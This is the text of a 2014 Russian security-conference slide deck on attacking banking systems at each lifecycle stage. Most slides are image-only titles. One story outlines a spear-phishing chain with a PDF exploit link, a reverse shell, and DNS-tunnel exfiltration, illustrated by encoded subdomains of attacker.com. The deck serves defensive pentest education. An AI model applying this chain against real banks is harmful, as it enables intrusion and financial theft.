Содержание;pdf

«От анализа кода до пентеста АБС
или как украсть миллиард»:
атаки на банковские приложения на каждом этапе жизненного
цикла в соответствии с новым стандартом ЦБ РФ.
Сергей Белов
аудитор ИБ Digital Security
«От анализа кода до пентеста АБС или как украсть миллиард»
Стадии жизненного цикла АБС
1. Разработка технического задания (ТЗ);
2. Проектирование;
3. Создание и тестирование;
4. Приемка и ввод в действие;
5. Эксплуатация;
6. Сопровождение и модернизация;
7. Снятие с эксплуатации.
© 2002—2014, Digital Security
2
«От анализа кода до пентеста АБС или как украсть миллиард»
Три истории
© 2002—2014, Digital Security
3
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – популярная, SSLная
© 2002—2014, Digital Security
4
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – SSL’ная
© 2002—2014, Digital Security
5
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – SSL’ная
© 2002—2014, Digital Security
6
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – SSL’ная
© 2002—2014, Digital Security
7
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – SSL’ная
© 2002—2014, Digital Security
8
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – SSL’ная
© 2002—2014, Digital Security
9
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – SSL’ная
© 2002—2014, Digital Security
10
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – SSL’ная
© 2002—2014, Digital Security
11
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – SSL’ная
© 2002—2014, Digital Security
12
«От анализа кода до пентеста АБС или как украсть миллиард»
История #1 – SSL’ная
• Разработка технического задания
• Создание и тестирование
• Приемка и ввод в действие
© 2002—2014, Digital Security
13
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 – хардкорная
© 2002—2014, Digital Security
14
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
Цель: получить контроль над рабочей станцией внутри
банка
© 2002—2014, Digital Security
15
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
Вектор:
1) Найти почту сотрудника
2) Отправить письмо с эксплойтом
3) Получить обратный шлюз
© 2002—2014, Digital Security
16
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
© 2002—2014, Digital Security
17
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
© 2002—2014, Digital Security
18
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
Специальное вложение? PDF!
© 2002—2014, Digital Security
19
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
http://www.exploit-db.com/exploits/29881/
© 2002—2014, Digital Security
20
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
2
1
3
Мы уже здесь!
© 2002—2014, Digital Security
21
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
Выбраться из потенциальной DMZ
банка?
DNS tunneling!
© 2002—2014, Digital Security
22
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
© 2002—2014, Digital Security
23
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
0x11112222222233333333.attacker.com
0x33333344444444445555.attacker.com
0x55555666666666777777.attacker.com
0x77777788888888999999.attacker.com
...
© 2002—2014, Digital Security
24
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
Конечный вектор:
1) Сбор информации (емейлов)
2) Создание вложения с эксплойтом
3) Отсылка письма с поддельным отправителем
4) Удаленное управление через DNS туннель
© 2002—2014, Digital Security
25
«От анализа кода до пентеста АБС или как украсть миллиард»
История #2 - хардкорная
Проблемы на этапах
1) Приемка и ввод в действие;
2) Эксплуатация;
3) Сопровождение и модернизация;
© 2002—2014, Digital Security
26
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 – тру-банковская
© 2002—2014, Digital Security
27
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
© 2002—2014, Digital Security
28
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
© 2002—2014, Digital Security
29
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
© 2002—2014, Digital Security
30
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
© 2002—2014, Digital Security
31
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
© 2002—2014, Digital Security
32
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
© 2002—2014, Digital Security
33
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
АБС
© 2002—2014, Digital Security
ДБО
34
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
АБС
© 2002—2014, Digital Security
ДБО
35
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
Интерфейс программы оператора
SQL
ДБО
© 2002—2014, Digital Security
36
«От анализа кода до пентеста АБС или как украсть миллиард»
История #3 - банковская
• Разработка технического задания (ТЗ);
• Проектирование;
• Создание и тестирование;
• Приемка и ввод в действие;
© 2002—2014, Digital Security
37
Спасибо за внимание!
Вопросы?
Digital Security в Москве: (495) 223-07-86
Digital Security в Санкт-Петербурге: (812) 703-15-47
http://twitter.com/sergeybelove
[email protected]
© 2002—2014, Digital Security
38